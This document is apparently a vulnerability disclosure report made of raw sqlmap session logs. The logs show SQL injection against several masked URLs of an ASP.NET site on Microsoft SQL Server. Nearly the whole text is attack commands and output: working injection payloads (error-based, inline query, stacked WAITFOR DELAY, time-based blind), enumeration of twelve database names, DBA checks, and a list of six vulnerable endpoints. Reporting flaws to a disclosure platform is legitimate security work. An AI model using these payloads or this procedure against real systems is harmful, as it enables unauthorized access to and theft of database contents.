[14:17:16] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 61 times, 500 (Internal Server Error) - 10 times
[14:17:16] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:17:16
C:\Python27\sqlmap>Sqlmap.py -u http://**.**.**.**/List.aspx?stid=5781 --d
bs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:17:20
[14:17:21] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:17:21] [INFO] testing connection to the target URL
[14:17:21] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(113)+(SEL
ECT (CASE WHEN (9289=9289) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(107)+CHAR(112)+CHAR(113))
---
[14:17:22] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:17:22] [INFO] fetching database names
[14:17:22] [WARNING] the SQL query provided does not return any output
[14:17:22] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[14:17:22] [INFO] retrieved: SDSW20_News
[14:17:23] [INFO] retrieved: master
[14:17:23] [INFO] retrieved: tempdb
[14:17:23] [INFO] retrieved: model
[14:17:24] [INFO] retrieved: msdb
[14:17:24] [INFO] retrieved: ReportServer
[14:17:24] [INFO] retrieved: ReportServerTempDB
[14:17:24] [INFO] retrieved: SDSW20_News
[14:17:24] [INFO] retrieved: Man_adv
[14:17:25] [INFO] retrieved: SDSW20_Main
[14:17:25] [INFO] retrieved: WebFiles
[14:17:25] [INFO] retrieved: NewsAPP
[14:17:25] [INFO] retrieved: 91haofang
[14:17:26] [INFO] retrieved:
available databases [12]:
[*] 91haofang
[*] Man_adv
[*] master
[*] model
[*] msdb
[*] NewsAPP
[*] ReportServer
[*] ReportServerTempDB
[*] SDSW20_Main
[*] SDSW20_News
[*] tempdb
[*] WebFiles
[14:17:26] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 2 times, 500 (Internal Server Error) - 14 times
[14:17:26] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:17:26
C:\Python27\sqlmap>Sqlmap.py -u http://**.**.**.**/List.aspx?stid=5781 --c
urrent-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:17:33
[14:17:34] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:17:34] [INFO] testing connection to the target URL
[14:17:34] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(113)+(SEL
ECT (CASE WHEN (9289=9289) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(107)+CHAR(112)+CHAR(113))
---
[14:17:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:17:35] [INFO] fetching current database
current database:       None
[14:17:35] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 2 times
[14:17:35] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:17:35
C:\Python27\sqlmap>Sqlmap.py -u http://**.**.**.**/List.aspx?stid=5781 --i
s-dba
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:18:29
[14:18:30] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:18:30] [INFO] testing connection to the target URL
[14:18:30] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(113)+(SEL
ECT (CASE WHEN (9289=9289) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(107)+CHAR(112)+CHAR(113))
---
[14:18:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:18:31] [INFO] testing if current user is DBA
current user is DBA:    False
[14:18:31] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 2 times
[14:18:31] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:18:31
C:\Python27\sqlmap>
案例2.
Microsoft Windows [版本 6.3.9600]
(c) 2013 Microsoft Corporation。保留所有权利。
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/special/2013/sbjszqh/lis
t.aspx?stid=5446&pageid=2
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:20:54
[14:20:54] [INFO] testing connection to the target URL
[14:20:55] [WARNING] reflective value(s) found and filtering out
[14:20:55] [INFO] testing if the target URL is stable
[14:20:56] [INFO] target URL is stable
[14:20:56] [INFO] testing if GET parameter 'stid' is dynamic
[14:20:56] [INFO] confirming that GET parameter 'stid' is dynamic
[14:20:56] [INFO] GET parameter 'stid' is dynamic
[14:20:56] [INFO] heuristic (basic) test shows that GET parameter 'stid' might b
e injectable (possible DBMS: 'Microsoft SQL Server')
[14:20:56] [INFO] testing for SQL injection on GET parameter 'stid'
it looks like the back-end DBMS is 'Microsoft SQL Server'. Do you want to skip t
est payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'Microsoft SQL Ser
ver' extending provided level (1) and risk (1) values? [Y/n]
[14:20:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:20:59] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace'
[14:20:59] [INFO] GET parameter 'stid' seems to be 'Microsoft SQL Server/Sybase
boolean-based blind - Parameter replace' injectable (with --string="\u7b56\u5212
\u3001\u5236\u4f5c\uff1a")
[14:20:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[14:20:59] [INFO] GET parameter 'stid' is 'Microsoft SQL Server/Sybase AND error
-based - WHERE or HAVING clause' injectable
[14:20:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[14:20:59] [INFO] GET parameter 'stid' is 'Microsoft SQL Server/Sybase inline qu
eries' injectable
[14:20:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[14:20:59] [WARNING] time-based comparison requires larger statistical model, pl
ease wait.........
[14:21:12] [INFO] GET parameter 'stid' seems to be 'Microsoft SQL Server/Sybase
stacked queries (comment)' injectable
[14:21:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:21:22] [INFO] GET parameter 'stid' seems to be 'Microsoft SQL Server/Sybase
time-based blind' injectable
[14:21:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:21:22] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
GET parameter 'stid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) re
quests:
---
Parameter: stid (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: stid=(SELECT (CASE WHEN (6827=6827) THEN 6827 ELSE 6827*(SELECT 682
7 FROM master..sysdatabases) END))
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: stid=5446 AND 7645=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(98)
+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7645=7645) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(122)+CHAR(113)+(SELE
CT (CASE WHEN (9009=9009) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+
CHAR(122)+CHAR(112)+CHAR(113))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: stid=5446;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: stid=5446 WAITFOR DELAY '0:0:5'
---
[14:22:23] [INFO] testing Microsoft SQL Server
[14:22:24] [INFO] confirming Microsoft SQL Server
[14:22:24] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:22:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 50 times
[14:22:24] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:22:24
'pageid' 不是内部或外部命令，也不是可运行的程序
或批处理文件。
C:\Python27\sqlmap>
案例1.
Microsoft Windows [版本 6.3.9600]
(c) 2013 Microsoft Corporation。保留所有权利。
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=5882
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:08:19
[14:08:20] [INFO] testing connection to the target URL
[14:08:20] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
[14:08:21] [INFO] testing if the target URL is stable
[14:08:21] [INFO] target URL is stable
[14:08:21] [INFO] testing if GET parameter 'stid' is dynamic
sqlmap got a 302 redirect to 'http://**.**.**.**:80/'. Do you want to follow?
 [Y/n]
[14:08:21] [INFO] confirming that GET parameter 'stid' is dynamic
[14:08:22] [INFO] GET parameter 'stid' is dynamic
[14:08:22] [INFO] heuristic (basic) test shows that GET parameter 'stid' might b
e injectable (possible DBMS: 'Microsoft SQL Server')
[14:08:22] [INFO] testing for SQL injection on GET parameter 'stid'
it looks like the back-end DBMS is 'Microsoft SQL Server'. Do you want to skip t
est payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'Microsoft SQL Ser
ver' extending provided level (1) and risk (1) values? [Y/n]
[14:08:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:08:24] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace'
[14:08:24] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace (original value)'
[14:08:24] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD
ER BY clause'
[14:08:24] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD
ER BY clause (original value)'
[14:08:24] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Sta
cked queries (IF)'
[14:08:27] [WARNING] reflective value(s) found and filtering out
[14:08:30] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Sta
cked queries'
[14:08:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[14:08:37] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause'
[14:08:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[14:08:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause (IN)'
[14:08:44] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[14:08:44] [INFO] GET parameter 'stid' is 'Microsoft SQL Server/Sybase error-bas
ed - Parameter replace' injectable
[14:08:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[14:08:45] [INFO] GET parameter 'stid' is 'Microsoft SQL Server/Sybase inline qu
eries' injectable
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (comment
)'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav
y query)'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query - comment)'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav
y query - comment)'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace (heavy queries)'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER
BY clause'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER
BY clause (heavy query)'
[14:08:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:08:45] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
GET parameter 'stid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection point(s) with a total of 435 HTTP(s) r
equests:
---
Parameter: stid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: stid=(CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+C
HAR(113)+(SELECT (CASE WHEN (3398=3398) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(1
13)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113))))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)+(SEL
ECT (CASE WHEN (5256=5256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(118)+CHAR(98)+CHAR(113))
---
[14:08:59] [INFO] testing Microsoft SQL Server
[14:08:59] [INFO] confirming Microsoft SQL Server
[14:09:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:09:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 32 times
[14:09:00] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:09:00
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=5882 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:09:07
[14:09:07] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:09:07] [INFO] testing connection to the target URL
[14:09:07] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: stid=(CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+C
HAR(113)+(SELECT (CASE WHEN (3398=3398) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(1
13)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113))))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)+(SEL
ECT (CASE WHEN (5256=5256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(118)+CHAR(98)+CHAR(113))
---
[14:09:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:09:08] [INFO] fetching database names
[14:09:08] [WARNING] the SQL query provided does not return any output
[14:09:08] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[14:09:08] [INFO] retrieved: SDSW20_News
[14:09:09] [INFO] retrieved: master
[14:09:09] [INFO] retrieved: tempdb
[14:09:09] [INFO] retrieved: model
[14:09:09] [INFO] retrieved: msdb
[14:09:10] [INFO] retrieved: ReportServer
[14:09:10] [INFO] retrieved: ReportServerTempDB
[14:09:10] [INFO] retrieved: SDSW20_News
[14:09:11] [INFO] retrieved: Man_adv
[14:09:11] [INFO] retrieved: SDSW20_Main
[14:09:11] [INFO] retrieved: WebFiles
[14:09:11] [INFO] retrieved: NewsAPP
[14:09:12] [INFO] retrieved: 91haofang
[14:09:12] [INFO] retrieved:
available databases [12]:
[*] 91haofang
[*] Man_adv
[*] master
[*] model
[*] msdb
[*] NewsAPP
[*] ReportServer
[*] ReportServerTempDB
[*] SDSW20_Main
[*] SDSW20_News
[*] tempdb
[*] WebFiles
[14:09:12] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 14 times
[14:09:12] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:09:12
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=5882 --curr
ent-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:09:38
[14:09:38] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:09:38] [INFO] testing connection to the target URL
[14:09:39] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: stid=(CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+C
HAR(113)+(SELECT (CASE WHEN (3398=3398) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(1
13)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113))))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)+(SEL
ECT (CASE WHEN (5256=5256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(118)+CHAR(98)+CHAR(113))
---
[14:09:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:09:39] [INFO] fetching current database
current database:       None
[14:09:39] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:09:39
C:\Python27\sqlmap>

漏洞证明：

提交六发案例其余自测...
http://**.**.**.**/list.aspx?stid=5882
http://**.**.**.**/special/2013/sbjszqh/list.aspx?stid=5446&pageid=2
http://**.**.**.**/List.aspx?stid=5781
http://**.**.**.**/quxian/List.aspx?AreaInfoID=119
http://**.**.**.**/pinggu/result.aspx?id=1051 --tables -D 91haofang
http://**.**.**.**/list.aspx?stid=6041

案例6.
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=6041
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:04:07
[14:04:07] [INFO] testing connection to the target URL
[14:04:07] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
[14:04:08] [INFO] testing if the target URL is stable
[14:04:08] [INFO] target URL is stable
[14:04:08] [INFO] testing if GET parameter 'stid' is dynamic
[14:04:09] [INFO] confirming that GET parameter 'stid' is dynamic
[14:04:09] [INFO] GET parameter 'stid' is dynamic
[14:04:09] [WARNING] heuristic (basic) test shows that GET parameter 'stid' migh
t not be injectable
[14:04:09] [INFO] testing for SQL injection on GET parameter 'stid'
[14:04:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:04:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[14:04:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[14:04:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:04:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[14:04:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[14:04:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[14:04:12] [INFO] testing 'MySQL inline queries'
[14:04:12] [INFO] testing 'PostgreSQL inline queries'
[14:04:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[14:04:12] [INFO] GET parameter 'stid' is 'Microsoft SQL Server/Sybase inline qu
eries' injectable
it looks like the back-end DBMS is '['Microsoft SQL Server', 'Sybase']'. Do you
want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for '['Microsoft SQL S
erver', 'Sybase']' extending provided level (1) and risk (1) values? [Y/n]
[14:04:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:04:13] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
GET parameter 'stid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) re
quests:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELE
CT (CASE WHEN (3618=3618) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+
CHAR(107)+CHAR(98)+CHAR(113))
---
[14:04:24] [INFO] testing Microsoft SQL Server
[14:04:25] [INFO] confirming Microsoft SQL Server
[14:04:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:04:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 14 times
[14:04:25] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:04:25
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=6041 --
current-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:04:32
[14:04:32] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:04:32] [INFO] testing connection to the target URL
[14:04:32] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELE
CT (CASE WHEN (3618=3618) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+
CHAR(107)+CHAR(98)+CHAR(113))
---
[14:04:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:04:33] [INFO] fetching current database
current database:       None
[14:04:33] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:04:33
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=6041 --
dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:04:40
[14:04:40] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:04:40] [INFO] testing connection to the target URL
[14:04:40] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELE
CT (CASE WHEN (3618=3618) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+
CHAR(107)+CHAR(98)+CHAR(113))
---
[14:04:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:04:41] [INFO] fetching database names
[14:04:41] [WARNING] the SQL query provided does not return any output
[14:04:41] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[14:04:41] [INFO] retrieved: SDSW20_News
[14:04:42] [INFO] retrieved: master
[14:04:42] [INFO] retrieved: tempdb
[14:04:42] [INFO] retrieved: model
[14:04:42] [INFO] retrieved: msdb
[14:04:42] [INFO] retrieved: ReportServer
[14:04:42] [INFO] retrieved: ReportServerTempDB
[14:04:42] [INFO] retrieved: SDSW20_News
[14:04:43] [INFO] retrieved: Man_adv
[14:04:43] [INFO] retrieved: SDSW20_Main
[14:04:43] [INFO] retrieved: WebFiles
[14:04:43] [INFO] retrieved: NewsAPP
[14:04:43] [INFO] retrieved: 91haofang
[14:04:43] [INFO] retrieved:
available databases [12]:
[*] 91haofang
[*] Man_adv
[*] master
[*] model
[*] msdb
[*] NewsAPP
[*] ReportServer
[*] ReportServerTempDB
[*] SDSW20_Main
[*] SDSW20_News
